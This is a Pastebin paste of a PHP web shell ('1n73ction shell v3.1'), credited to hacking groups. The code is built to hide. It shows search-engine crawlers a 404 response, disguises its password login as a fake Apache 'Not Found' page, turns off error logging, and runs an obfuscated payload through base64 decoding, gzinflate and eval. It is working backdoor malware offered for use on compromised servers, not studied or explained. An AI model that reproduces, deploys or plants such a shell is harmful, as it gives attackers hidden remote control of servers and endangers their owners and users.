fahim420

injection shell

Apr 17th, 2015
62
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.93 KB | None | 0 0
  1. <?php
  2. /* (1n73ction shell v3.1 by x'1n73ct|default pass:" 1n73ction ") */
  3. $auth_pass = "9c80a1eaca699e2fc6b994721f8703bc";
  4. $color = "#00ff00";
  5. $default_action = 'FilesMan';
  6. @define('SELF_PATH', __FILE__);
  7. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  8. header('HTTP/1.0 404 Not Found');
  9. exit;
  10. }
  11. @session_start();
  12. @error_reporting(0);
  13. @ini_set('error_log',NULL);
  14. @ini_set('log_errors',0);
  15. @ini_set('max_execution_time',0);
  16. @ini_set('output_buffering',0);
  17. @ini_set('display_errors', 0);
  18. @set_time_limit(0);
  19. @set_magic_quotes_runtime(0);
  20. @define('VERSION', '2.1');
  21. if( get_magic_quotes_gpc() ) {
  22. function stripslashes_array($array) {
  23. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  24. }
  25. $_POST = stripslashes_array($_POST);
  26. }
  27. function printLogin() {
  28. ?> <title>404 Not Found</title>
  29. <h1>Not Found</h1>
  30. <p>The requested URL was not found on this server.</p>
  31. <hr>
  32. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  33. <style>
  34. input { margin:0;background-color:#fff;border:1px solid #fff; }
  35. </style><?php
  36. if(isset($_REQUEST['cmd'])){
  37. switch ($_REQUEST['cmd']){ case "../../exe/inject":?>
  38. <center>
  39. <form method=post>
  40. <input type=password name=pass>
  41. </form></center>
  42. <?php break ;}}
  43. exit;
  44. }
  45. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  46. if( empty( $auth_pass ) ||
  47. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  48. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  49. else
  50. printLogin();
  51. @ini_set('output_buffering',0);
  52. /* cyber173 enc0de */ if((preg_match(base64_decode('L2V2YWwvCg=='),file_get_contents(__FILE__)))&&(function_exists(soundex('cyber173_decode')))){define("\x43\x59\x42\x45\x52\x31\x37\x33", "ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnCg==");define("\x57\x61\x73", "jVDPS8MwFL4P+j/kUGgKZUUQD4Yh`qycedErdvJYsfV2`dMSl9r3M49r+bthadBzGX5H2/3ke`cSdlaRdpZtt8C8bBtTHwIC0m`szZjyU66tJh6L/o1Arvaqjk/Y9Tq7f3xa5dlitc6`wq2y+fL5dZAk7+1Ptr4T1e0R`ySdRmXAR7UIP4y6+MQxiRBqhtL`bss4hicFsdfzUttIPd4rpwlsCMv2BjT6U5TupWDih10yfjI+F4afU`dUd9pBgx6MYq+CnTR8+6FtaS`qB30iEi/O8AOUK4N/f6Y84gk`h4hwN/WHy7oVRUEdWXa`vpLJNhoO1XuLS3cuz`vOFtO6qq/07AXnr3f4cBPFIph8`ag==");define("\x48\x65\x72\x65", "JykpKTsK");}function C163($Ox31,$Ox32,$Ox33){return base64_decode($Ox31).preg_replace_callback(urldecode('%7E%60%28%5B%61%2D%7A%5D%29%7E'),function($alpha){return strtoupper($alpha[1]);},$Ox32).base64_decode($Ox33);}class cyber173{function cyber173_encode(){$is = 'cyber173_code';$this->$is(eval(C163(CYBER173,Was,Here)));}function cyber173_code($x){return $x;}}$cyber173_encode = new cyber173();$cyber173_decode = "cyber173_encode";$cyber173_encode->$cyber173_decode();
  53. /* tanks for: Mr_GanDrunX | Hidden-name Corps | IFC | IBC | BNT | SBH | AnonGhost | Devilz c0de | Jasakom | cyberdark */
  54. /* by X-1N73CT a.k.a cyber173 & S1T1 B4RC0D3*/
  55. ?>
Add Comment
Please, Sign In to add comment